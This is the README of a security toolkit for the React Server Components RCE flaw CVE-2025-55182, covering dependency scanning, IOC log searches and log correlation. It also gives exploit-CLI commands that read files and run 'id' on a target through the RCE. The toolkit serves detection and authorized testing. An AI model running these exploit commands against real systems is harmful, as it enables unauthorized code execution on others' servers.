Share
## https://sploitus.com/exploit?id=23931478-48E4-5A71-8A9B-785281FABB97
# flight-risk
> **flight risk** /flaΙͺt rΙͺsk/ β React's [Flight protocol](https://github.com/facebook/react/tree/main/packages/react-server) is the serialization layer behind React Server Components. CVE-2025-55182 exploits a deserialization flaw in Flight to achieve pre-auth RCE. If your app uses RSC, it's a *flight risk*.
Security toolkit for **CVE-2025-55182 (React2Shell)** β a CVSS 10.0 pre-authentication remote code execution vulnerability in React Server Components. Scan, detect, correlate, and test.
## What's Inside
| Tool | What it does |
|---|---|
| **[react2shell-scanner](react2shell-scanner/README.md)** | Scan GitHub orgs and GCP projects for vulnerable React/Next.js dependencies. Authorized exploit testing (safe-probe, file read, dir list, command exec). |
| **[gcp-ioc-scanner](gcp-ioc-scanner/README.md)** | Query GCP Cloud Logging for Indicator of Compromise patterns across multiple projects and K8s services. Pluggable IOC definitions. |
| **[gcp-log-correlator](gcp-log-correlator/README.md)** | Correlate GCP log events by time proximity on the same pod β e.g., find which HTTP request triggered an RCE error. |
## Quick Start
```bash
# Clone
git clone https://github.com/YOUR_USER/flight-risk.git
cd flight-risk
# Install dependencies
pip install -r react2shell-scanner/requirements.txt
pip install pyyaml # for gcp-ioc-scanner
# Make scripts executable
chmod +x react2shell-scanner/bin/*
chmod +x gcp-ioc-scanner/gcp-ioc-scanner
chmod +x gcp-log-correlator/gcp-log-correlator
# Authenticate
gh auth login # GitHub scanning
gcloud auth application-default login # GCP scanning + log analysis
```
## Usage
All commands run from the repo root.
### Scan GitHub org for vulnerable dependencies
```bash
react2shell-scanner/bin/scan-github \
--org YOUR_GITHUB_ORG \
--output ./results/github
```
### Scan GCP project for vulnerable container images
```bash
react2shell-scanner/bin/scan-gcp \
--project YOUR_GCP_PROJECT \
--output ./results/gcp
```
### Combined scan (GitHub + GCP)
```bash
react2shell-scanner/bin/scan-all \
--org YOUR_GITHUB_ORG \
--project YOUR_GCP_PROJECT \
--output ./results
```
### Safe vulnerability detection (no code execution)
```bash
python3 react2shell-scanner/cli.py https://your-app.example.com
```
### Authorized exploit testing
```bash
# Dry run β show payload without sending
python3 react2shell-scanner/cli.py --dry-run --verbose https://your-app.example.com
# Read file via RCE
python3 react2shell-scanner/cli.py --method read-file https://your-app.example.com /etc/hostname
# List directory via RCE
python3 react2shell-scanner/cli.py --method list-dir https://your-app.example.com /app
# Execute command via RCE
python3 react2shell-scanner/cli.py --method exec-cmd https://your-app.example.com "id"
# Batch targets
python3 react2shell-scanner/cli.py --targets targets.txt --output results.json
```
### Scan GCP logs for IOC patterns
```bash
gcp-ioc-scanner/gcp-ioc-scanner \
--targets gcp-ioc-scanner/examples/targets-example.yaml \
--iocs gcp-ioc-scanner/iocs/cve-2025-55182.yaml \
--start 2026-01-01 \
--end 2026-04-01 \
--output ./results/ioc-scan
```
### Correlate log events (find the request that caused an RCE)
```bash
gcp-log-correlator/gcp-log-correlator \
--project YOUR_GCP_PROJECT \
--namespace frontend \
--pod-pattern "web-app.*" \
--trigger-filter 'severity=ERROR' \
--preceding-filter 'httpRequest.requestMethod:*' \
--window 30s \
--start 2026-04-01T00:00:00Z \
--end 2026-04-02T00:00:00Z \
--format json,markdown \
--output ./results/correlation
```
## Docker
```bash
cd react2shell-scanner
docker compose -f docker/docker-compose.yml build
docker compose -f docker/docker-compose.yml run scanner-shell
```
## Directory Layout
```
flight-risk/
βββ README.md
βββ LICENSE
βββ react2shell-scanner/
β βββ bin/ # scan-github, scan-gcp, scan-all
β βββ cli.py # Exploit testing CLI
β βββ exploit.py # Exploitation logic
β βββ utils.py # Shared utilities
β βββ lib/ # Shell + Python helpers
β βββ vuln-defs/ # Pluggable vulnerability definitions
β βββ docker/ # Containerized scanning
β βββ examples/ # Example scripts
β βββ test-app/ # Vulnerable Next.js fixture
β βββ requirements.txt
βββ gcp-ioc-scanner/
β βββ gcp-ioc-scanner # IOC log scanner
β βββ iocs/ # IOC pattern definitions
β βββ examples/ # Target config examples
βββ gcp-log-correlator/
βββ gcp-log-correlator # Event correlator
βββ examples/ # Correlation examples
```
## Requirements
- Python 3.10+
- GitHub CLI (`gh`)
- Google Cloud SDK (`gcloud`)
- `jq`
- Docker 20.10+ (optional)
## CVE-2025-55182
| | |
|---|---|
| **CVSS** | 10.0 Critical |
| **Vector** | Network / Pre-auth / No interaction |
| **React** | 19.0.0 - 19.2.0 (fixed in 19.3.0) |
| **Next.js** | 14.3.0 - 15.3.5, 16.0.0 - 16.0.7 (fixed in 15.3.6, 16.0.8) |
| **Root cause** | Unsafe deserialization in React Flight protocol |
| **Impact** | Full RCE as the application process user |
## Legal
**Authorized use only.** This toolkit contains exploit code. Use it only against systems you own or have explicit written authorization to test. Unauthorized use may violate the Computer Fraud and Abuse Act (18 U.S.C. 1030) and equivalent laws.
## License
MIT -- see [LICENSE](LICENSE).